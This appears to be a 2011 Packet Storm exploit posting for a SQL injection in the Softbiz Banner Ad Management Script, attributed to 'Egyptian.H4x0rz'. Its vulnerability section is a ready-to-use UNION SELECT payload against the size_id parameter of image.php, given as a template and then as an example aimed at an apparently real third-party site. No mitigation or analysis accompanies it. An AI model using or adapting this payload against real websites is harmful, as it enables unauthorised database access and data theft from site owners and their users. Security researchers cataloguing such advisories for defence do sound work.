Softbiz Banner Ad Management SQL Injection

2011-04-02T00:00:00
ID PACKETSTORM:100013
Type packetstorm
Reporter Egyptian.H4x0rz
Modified 2011-04-02T00:00:00

Description

                                        
                                            `####################################################################  
[+] Exploit Title : Banner Ad Management Script [ Sql Injection Vulnerability]  
[+] Author : Egyptian.H4x0rz  
[+] Contact : SpY(at)Hotmail.Com  
[+] Date : 02-04-2011  
[+] Software Link: http://www.softbizscripts.com/banner-ads-management-script-features.php  
[+] category: Web Apps [SQli]  
[+] HomePage : Black-hat.cc  
####################################################################  
Vulnerability:  
  
*SQL injection Vulnerability*  
  
[#] http://patch/image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11  
~  
[#] eXample  
http://www.housemusik.dk/ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11  
  
####################################################################  
  
`